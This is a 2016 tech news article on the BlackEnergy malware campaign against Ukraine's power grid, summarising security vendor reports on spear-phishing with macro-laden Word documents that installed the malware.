BlackEnergy campaign shows the dangers of spear-phishing, having untrained employees, and Word's ever-lasting macro bug

Jan 28, 2016 13:20 GMT  ·  By
BlackEnergy hackers used weaponized docs to spread their malware in Ukraine's power grid IT network
2 photos
   BlackEnergy hackers used weaponized docs to spread their malware in Ukraine's power grid IT network

Two reports released yesterday by both Kaspersky and SentinelOne revealed more details about the malware attack on Ukraine's power grid, which took place this past Christmas.

If you've lost count of what happened because of the thousands of media reports on this topic, the events went as follows.

A summary of the Ukraine power grid cyber-attack(s)

Just before Christmas, Ukraine experienced blackouts in its Western regions (Ivano-Frankivsk, Horodenka, Kalush, Dolyna, Kosiv, Tysmenytsia, Nadvirna, and Yaremche) that were under the control of the pro-EU government.

The blackouts lasted for hours, and according to SBU, Ukraine's Security Service, they were caused by malware that infected the IT system of Prykarpattiaoblenergo, a Ukrainian power supply company.

To make things worse, the company's staff was kept busy dealing with a flood of telephone calls, instead of disinfecting the computer network.

Soon after the incident, ESET security researchers that have analyzed some of the malware samples said it was the work of the Russian-linked BlackEnergy APT (Advanced Persistent Threat, a term used for cyber-espionage hacking crews that carry out targeted attacks against carefully planned and strategic objects).

The malware family used in this incident is also known as BlackEnergy and is the group's own creation, specifically aimed at targeting ICS/SCADA equipment, usually found in power grids, linked to various computer systems.

But things didn't stop here. Just a few days ago, Ukraine also reported a similar malware incident that affected the IT system of Kiev's Boryspil international airport, but that attack was stopped before it could do any damage.

Attackers used malicious Word documents to spread the malware

Besides ESET, who initially reported on this topic, two other security vendors also got a look at the BlackEnergy malware. Both Kaspersky and SentinelOne have now issued in-depth reports on the malware's mode of operation.

The version used in the Ukraine attack is a new version (v3) that leveraged an older Office 2013 security flaw (CVE-2014-4114) to compromise computers. BlackEnergy previously exploited this same vulnerability in other attacks as well. Although the bug also affects Powerpoint files, for this campaign, BlackEnergy leveraged Word files.

As usual, these malicious Word documents were passed around to victims via highly targeted spear-phishing campaigns, which are often very effective, since each email is specifically customized to each recipient's personal interests and Internet browsing habits.

Once the recipient would download and open these files, a warning would tell him to enable Word's "macro" feature, a known source (for security experts at least) for multiple vulnerabilities.

If the user did so, then his system would be immediately compromised because the document would be booby-trapped to launch Word's automated macro feature to execute a series of operations, and download and install the BlackEnergy malware.

From here on out, using its specially crafted modules that targeted vulnerabilities in ICS/SCADA components, the malware systematically caused problems for Prykarpattiaoblenergo's staff, by making equipment falter or shut down.

Sample of weaponized Word document used in the Ukraine attacks
Sample of weaponized Word document used in the Ukraine attacks

Photo Gallery (2 Images)

BlackEnergy hackers used weaponized docs to spread their malware in Ukraine's power grid IT network
Sample of weaponized Word document used in the Ukraine attacks
Open gallery